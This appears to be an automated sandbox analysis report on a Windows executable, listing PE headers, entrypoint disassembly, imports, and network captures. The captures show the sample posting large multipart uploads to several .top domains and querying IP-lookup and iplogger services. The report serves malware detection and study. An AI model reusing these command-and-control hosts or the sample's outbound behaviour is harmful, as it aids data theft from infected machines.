                                                                    SHA512:604c56940caf033ea9132067f47030272042c22d73c4ea8744508e75cca5d6c6058c917c32f72b0e29cecb2c5349e52a111af15f21990d2089f4ed098773565d
                                                                    SSDEEP:6144:KWlOABZeO3au2bLpXWdCn7p7DdVr1gmImu3kr1jtCGT7AqLKVt8xijgSFDE:KW8EZ93aBLpXaqhRXgw5Cw8VtDjv9
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#...#...#...U1..#...U...#...U0..#...[...#...#...#...U5..#...U...#...U...#..Rich.#..................PE..L.../_e`...........

                                                                    File Icon

                                                                    Icon Hash:aadaae9ec6a68aa4

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x402310
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x60655F2F [Thu Apr 1 05:50:39 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:56c207817e66e7690a43bf97b1ee7374

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    call 00007F7918A1762Bh
                                                                    call 00007F7918A0CE66h
                                                                    pop ebp
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push FFFFFFFEh
                                                                    push 004234B0h
                                                                    push 004096A0h
                                                                    mov eax, dword ptr fs:[00000000h]
                                                                    push eax
                                                                    add esp, FFFFFF98h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    mov eax, dword ptr [00425918h]
                                                                    xor dword ptr [ebp-08h], eax
                                                                    xor eax, ebp
                                                                    push eax
                                                                    lea eax, dword ptr [ebp-10h]
                                                                    mov dword ptr fs:[00000000h], eax
                                                                    mov dword ptr [ebp-18h], esp
                                                                    mov dword ptr [ebp-70h], 00000000h
                                                                    lea eax, dword ptr [ebp-60h]
                                                                    push eax
                                                                    call dword ptr [0041C0ECh]
                                                                    cmp dword ptr [02B8EE80h], 00000000h
                                                                    jne 00007F7918A0CE60h
                                                                    push 00000000h
                                                                    push 00000000h
                                                                    push 00000001h
                                                                    push 00000000h
                                                                    call dword ptr [0041C0B0h]
                                                                    call 00007F7918A0CFE3h
                                                                    mov dword ptr [ebp-6Ch], eax
                                                                    call 00007F7918A1814Bh
                                                                    test eax, eax
                                                                    jne 00007F7918A0CE5Ch
                                                                    push 0000001Ch
                                                                    call 00007F7918A0CFA0h
                                                                    add esp, 04h
                                                                    call 00007F7918A0FA08h
                                                                    test eax, eax
                                                                    jne 00007F7918A0CE5Ch
                                                                    push 00000010h
                                                                    call 00007F7918A0CF8Dh
                                                                    add esp, 04h
                                                                    push 00000001h
                                                                    call 00007F7918A14103h
                                                                    add esp, 04h
                                                                    call 00007F7918A180BBh
                                                                    mov dword ptr [ebp-04h], 00000000h
                                                                    call 00007F7918A1704Fh
                                                                    test eax, eax

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [LNK] VS2010 build 30319
                                                                    • [ASM] VS2010 build 30319
                                                                    • [ C ] VS2010 build 30319
                                                                    • [C++] VS2010 build 30319
                                                                    • [RES] VS2010 build 30319
                                                                    • [IMP] VS2008 SP1 build 30729

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x23aa40x50.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x27900000x3120.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x27940000x1868.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1c2200x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x232a00x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1c0000x1d4.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x1a60b0x1a800False0.453898879717data6.24968179234IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x1c0000x85820x8600False0.28565181903data4.60513458883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x250000x276ae840x25e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x27900000x31200x3200False0.749140625data6.50262439546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x27940000x10a040x10c00False0.0790286847015data1.02238104719IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    AFX_DIALOG_LAYOUT0x2792fe80x2dataMongolianMongolia
                                                                    PAMIFEGIHURULUFUKIYUVUWOGULOJOK0x27928600x6f0ASCII text, with very long lines, with no line terminatorsMongolianMongolia
                                                                    RT_ICON0x27902a00x25a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                    RT_ACCELERATOR0x2792f500x78dataMongolianMongolia
                                                                    RT_GROUP_ICON0x27928480x14dataEnglishUnited States
                                                                    RT_VERSION0x2792ff00x130dataMongolianMongolia
                                                                    None0x2792fc80xadataMongolianMongolia
                                                                    None0x2792fd80xadataMongolianMongolia

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllTlsGetValue, SetLocalTime, InterlockedIncrement, GetCommState, GetProfileStringW, UnlockFile, CallNamedPipeW, FreeEnvironmentStringsA, GetNumberFormatA, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, LoadLibraryW, GetConsoleAliasExesLengthW, HeapDestroy, CreateSemaphoreA, EnumResourceLanguagesA, GetModuleFileNameW, GetCompressedFileSizeA, GetSystemDirectoryA, CreateActCtxA, GetBinaryTypeW, LCMapStringA, GetStartupInfoA, lstrlenA, GetStdHandle, FreeLibraryAndExitThread, GetLastError, GetProcAddress, CreateNamedPipeA, EnterCriticalSection, LoadLibraryA, OpenMutexA, WritePrivateProfileStringA, SetThreadIdealProcessor, FindAtomA, SetSystemTime, FindNextFileA, WriteProfileStringA, CreateIoCompletionPort, FindFirstChangeNotificationA, HeapSetInformation, GetCurrentDirectoryA, SetFileShortNameA, UnregisterWaitEx, CopyFileExA, DeleteFileA, GetVolumeInformationW, LocalFileTimeToFileTime, GetThreadContext, SetThreadLocale, GetCommandLineW, WideCharToMultiByte, EncodePointer, DecodePointer, GetCommandLineA, GetStartupInfoW, InterlockedDecrement, GetModuleHandleW, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, SetLastError, HeapValidate, IsBadReadPtr, LeaveCriticalSection, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, IsProcessorFeaturePresent, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, SetStdHandle, FlushFileBuffers, RaiseException, CreateFileW, CloseHandle
                                                                    ADVAPI32.dllInitiateSystemShutdownA, AbortSystemShutdownA
                                                                    WINHTTP.dllWinHttpOpen

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0120 0x04b8

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    MongolianMongolia
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 28, 2021 15:24:06.687999010 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.750448942 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.750557899 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.751216888 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.751425982 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.751626968 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.814325094 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.814424992 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.814749956 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.814905882 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.879837036 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.879978895 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.880781889 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.880812883 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.880886078 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.880920887 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.881453037 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.881541967 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.882301092 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.882384062 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.941416025 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.941437006 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.941762924 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.941778898 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.942296982 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.944212914 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.944278955 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.944294930 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.990432024 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:06.990590096 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:06.990777016 CEST4975280192.168.2.745.140.167.227
                                                                    Sep 28, 2021 15:24:07.054300070 CEST804975245.140.167.227192.168.2.7
                                                                    Sep 28, 2021 15:24:08.763298988 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:08.930423021 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:08.930617094 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:08.931358099 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:08.931757927 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:08.931886911 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.099831104 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099860907 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099879026 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099894047 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099910021 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099920034 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099929094 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099942923 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.099971056 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.100065947 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268173933 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268224001 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268273115 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268312931 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268316984 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268337011 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268362999 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268364906 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268387079 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268405914 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268409967 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268433094 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268439054 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268454075 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268467903 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268475056 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268477917 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268491983 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.268492937 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.268528938 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:09.436531067 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436554909 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436564922 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436578989 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436592102 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436609983 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436626911 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436657906 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.436677933 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437052011 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437071085 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437151909 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437189102 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437223911 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437252998 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437278032 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437302113 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437326908 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:09.437357903 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:10.087445021 CEST8049755104.168.214.97192.168.2.7
                                                                    Sep 28, 2021 15:24:10.087598085 CEST4975580192.168.2.7104.168.214.97
                                                                    Sep 28, 2021 15:24:11.096357107 CEST4975680192.168.2.7185.185.71.183
                                                                    Sep 28, 2021 15:24:11.146008015 CEST8049756185.185.71.183192.168.2.7
                                                                    Sep 28, 2021 15:24:11.146097898 CEST4975680192.168.2.7185.185.71.183
                                                                    Sep 28, 2021 15:24:11.146605015 CEST4975680192.168.2.7185.185.71.183
                                                                    Sep 28, 2021 15:24:11.239454985 CEST8049756185.185.71.183192.168.2.7
                                                                    Sep 28, 2021 15:24:11.297038078 CEST8049756185.185.71.183192.168.2.7
                                                                    Sep 28, 2021 15:24:11.297173023 CEST4975680192.168.2.7185.185.71.183
                                                                    Sep 28, 2021 15:24:11.297930956 CEST4975680192.168.2.7185.185.71.183
                                                                    Sep 28, 2021 15:24:11.300062895 CEST4975780192.168.2.7185.185.71.183
                                                                    Sep 28, 2021 15:24:11.347624063 CEST8049756185.185.71.183192.168.2.7
                                                                    Sep 28, 2021 15:24:11.348984957 CEST8049757185.185.71.183192.168.2.7

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 28, 2021 15:23:51.557045937 CEST5541153192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:23:51.578666925 CEST53554118.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:06.556492090 CEST6366853192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:06.664118052 CEST53636688.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:08.303037882 CEST5464053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:08.320873022 CEST53546408.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:08.434087992 CEST5873953192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:08.758584976 CEST53587398.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:10.774172068 CEST6033853192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:11.094662905 CEST53603388.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:23.648773909 CEST5871753192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:23.666517973 CEST53587178.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:28.178381920 CEST5976253192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:28.197277069 CEST53597628.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:29.912893057 CEST5432953192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:29.940814972 CEST53543298.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:33.115497112 CEST5805253192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:33.146806002 CEST53580528.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:43.539726019 CEST5400853192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:43.573121071 CEST53540088.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:45.744656086 CEST5945153192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:45.765003920 CEST53594518.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:46.950778008 CEST5291453192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:46.982697964 CEST53529148.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:47.508183002 CEST6456953192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:47.527687073 CEST53645698.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:47.933339119 CEST5281653192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:47.953200102 CEST53528168.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:48.394443035 CEST5078153192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:48.413608074 CEST53507818.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:48.813858986 CEST5423053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:48.832437038 CEST53542308.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:49.296349049 CEST5491153192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:49.315634966 CEST53549118.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:50.651793003 CEST4995853192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:50.669152021 CEST53499588.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:50.710241079 CEST5086053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:50.727736950 CEST53508608.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:51.401048899 CEST5045253192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:51.420974970 CEST53504528.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:51.799473047 CEST5973053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:51.818702936 CEST53597308.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:51.874804974 CEST5931053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:51.901767015 CEST53593108.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:24:58.374469042 CEST5191953192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:24:58.391902924 CEST53519198.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:13.488135099 CEST6429653192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:13.507829905 CEST53642968.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:33.171108007 CEST5668053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:33.198484898 CEST53566808.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:34.060903072 CEST5882053192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:34.080854893 CEST53588208.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:25:36.099214077 CEST6098353192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:25:36.126900911 CEST53609838.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:00.674165964 CEST4924753192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:00.693720102 CEST53492478.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:15.793072939 CEST5228653192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:15.815259933 CEST53522868.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:16.085074902 CEST5606453192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:16.121566057 CEST53560648.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:18.772794962 CEST6374453192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:18.794512033 CEST53637448.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:26:29.894804001 CEST6145753192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:26:29.913731098 CEST53614578.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:27:01.026047945 CEST5836753192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:27:01.046878099 CEST53583678.8.8.8192.168.2.7
                                                                    Sep 28, 2021 15:27:45.151653051 CEST6059953192.168.2.78.8.8.8
                                                                    Sep 28, 2021 15:27:45.168487072 CEST53605998.8.8.8192.168.2.7

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Sep 28, 2021 15:24:06.556492090 CEST192.168.2.78.8.8.80x93d1Standard query (0)pacdpo22.topA (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:24:08.434087992 CEST192.168.2.78.8.8.80xb75dStandard query (0)moreil02.topA (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:24:10.774172068 CEST192.168.2.78.8.8.80xd16eStandard query (0)zukelx03.topA (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:24:23.648773909 CEST192.168.2.78.8.8.80x967Standard query (0)YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCRA (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:26:15.793072939 CEST192.168.2.78.8.8.80xea84Standard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:26:18.772794962 CEST192.168.2.78.8.8.80x36ecStandard query (0)iplogger.orgA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Sep 28, 2021 15:24:06.664118052 CEST8.8.8.8192.168.2.70x93d1No error (0)pacdpo22.top45.140.167.227A (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:24:08.758584976 CEST8.8.8.8192.168.2.70xb75dNo error (0)moreil02.top104.168.214.97A (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:24:08.758584976 CEST8.8.8.8192.168.2.70xb75dNo error (0)moreil02.top213.252.245.117A (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:24:11.094662905 CEST8.8.8.8192.168.2.70xd16eNo error (0)zukelx03.top185.185.71.183A (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:24:23.666517973 CEST8.8.8.8192.168.2.70x967Name error (3)YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCRnonenoneA (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:26:15.815259933 CEST8.8.8.8192.168.2.70xea84No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                    Sep 28, 2021 15:26:18.794512033 CEST8.8.8.8192.168.2.70x36ecNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • iplogger.org
                                                                    • pacdpo22.top
                                                                    • moreil02.top
                                                                    • zukelx03.top
                                                                    • ip-api.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.74984988.99.66.31443C:\Windows\SysWOW64\wscript.exe
                                                                    TimestampkBytes transferredDirectionData


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.74975245.140.167.22780C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Sep 28, 2021 15:24:06.751216888 CEST836OUTPOST /index.php HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=---------------------------
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                    Host: pacdpo22.top
                                                                    Content-Length: 73148
                                                                    Cache-Control: no-cache
                                                                    Sep 28, 2021 15:24:06.990432024 CEST909INHTTP/1.1 200 OK
                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                    Date: Tue, 28 Sep 2021 13:24:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 36
                                                                    Connection: close
                                                                    ETag: W/"24-dqOYQ6lgKdJu+elnBEH9LXSF3AM"
                                                                    Data Raw: 63 33 39 61 34 31 30 32 2d 35 62 33 65 2d 34 66 62 34 2d 61 39 33 31 2d 34 35 38 36 39 39 62 33 36 64 39 36
                                                                    Data Ascii: c39a4102-5b3e-4fb4-a931-458699b36d96


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.749755104.168.214.9780C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Sep 28, 2021 15:24:08.931358099 CEST932OUTPOST /index.php HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=---------------------------
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                    Host: moreil02.top
                                                                    Content-Length: 73136
                                                                    Cache-Control: no-cache
                                                                    Sep 28, 2021 15:24:10.087445021 CEST1006INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Tue, 28 Sep 2021 13:24:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 36
                                                                    Connection: keep-alive
                                                                    ETag: W/"24-hadwo3lSsMMDn1mDvveoEjCw6v0"
